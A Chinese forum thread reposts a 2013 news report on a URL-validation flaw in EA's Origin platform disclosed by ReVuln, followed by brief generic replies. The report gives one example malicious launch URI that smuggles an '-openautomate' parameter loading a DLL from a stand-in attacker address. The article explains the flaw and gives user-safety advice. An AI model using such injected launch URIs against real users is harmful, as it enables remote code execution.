馬上註冊  |  找回密碼

SAY討論區

查看: 249|回復: 18
打印 上一主題 下一主題

EA又中槍:Origin平臺被曝安全漏洞 [複製鏈接]

Rank: 6Rank: 6

好友
0
帖子
4115
積分
9674
最後登錄
2018-7-30
在線時間
0 小時
跳轉到指定樓層
樓主
發表於 2013-3-19 12:21:26 |只看該作者 |倒序瀏覽
名為ReVuln的計算機安全公司曾在去年曝光瞭Steam平臺存在URL地址訪問安全漏洞,現在該公司再次在阿姆斯特丹召開的Black Hat安全會議上指出EA的Origin平臺同樣具有類似的問題。

ReVuln公司的研究人員表示,在經過多次測試之後證明,Origin平臺的URL驗證機制存在漏洞,黑客可以利用這一漏洞推送假冒URL鏈接來向玩家計算機中安裝惡意程序。

通常來說,玩家在試圖通過Origin啟動遊戲時,客戶端會先向服務器請求一個用來啟動遊戲的URL地址,比如:origin://LaunchGame/[GameID],而如果該地址被黑客攔截並替換成包含有不良內容的加鏈接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那麼一旦當玩家執行啟動遊戲操作時便會導致自己的計算機遭遇安全風險。

不過,研究人員也表示,雖然Origin平臺自身具有這樣的安全機制缺陷,但黑客想要通過這種方式對用戶發起攻擊也並非易於反掌,因為目前大多瀏覽器產品都具有非法URL過濾攔截功能,所以為瞭確保計算機的安全,用戶一定要保證打開相關的瀏覽器安全功能,並且安裝有最新版的防病毒軟件,同時拒絕訪問那些不熟悉的URL地址。

vi3ad0dse4s15.jpg

[文章糾錯]

分享分享0 收藏收藏0 讚好讚好0 Unlike!Unlike!0 分享 傳送 邀請

好友
0
帖子
135443
積分
146309
最後登錄
2019-2-28
在線時間
0 小時
No.1回覆者
發表於 2013-3-19 13:06:18 |只看該作者
快站沙發,不知道有沒有成功

好友
0
帖子
124473
積分
124481
最後登錄
2019-2-28
在線時間
0 小時
跟尾2
發表於 2013-3-19 13:24:00 |只看該作者
貌似看過了

好友
0
帖子
124473
積分
124481
最後登錄
2019-2-28
在線時間
0 小時
跟尾3
發表於 2013-3-19 13:26:16 |只看該作者
好帖子,要頂!

好友
0
帖子
124512
積分
124522
最後登錄
2019-2-28
在線時間
0 小時
5#
發表於 2013-3-19 13:30:15 |只看該作者
我的媽呀,愛死你了

好友
0
帖子
124473
積分
124481
最後登錄
2019-2-28
在線時間
0 小時
6#
發表於 2013-3-19 13:45:36 |只看該作者
先看看怎麼樣!

好友
0
帖子
124731
積分
124889
最後登錄
2019-2-28
在線時間
0 小時
7#
發表於 2013-3-19 21:15:54 |只看該作者
你你你你 呵呵~~~~別這樣哦...

好友
0
帖子
127486
積分
130183
最後登錄
2019-2-28
在線時間
0 小時
8#
發表於 2013-3-19 23:21:03 |只看該作者
一樓的位置好啊.

好友
0
帖子
124512
積分
124519
最後登錄
2019-2-28
在線時間
0 小時
9#
發表於 2013-3-20 01:44:59 |只看該作者
看了你的帖,讓我有一種說不出的感覺

好友
0
帖子
123890
積分
123896
最後登錄
2019-2-28
在線時間
0 小時
10#
發表於 2013-3-20 03:05:56 |只看該作者
也許似乎大概是,然而未必不見得。
您需要登錄後才可以回帖 登錄 | 馬上註冊 |

Archiver|手機版|SAY討論區

GMT+8, 2026-6-6 05:37 , Processed in 0.776613 second(s), 11 queries .

Powered by go2tutor.comDiscuz! X2

© 2026 Community Networks Limited

回頂部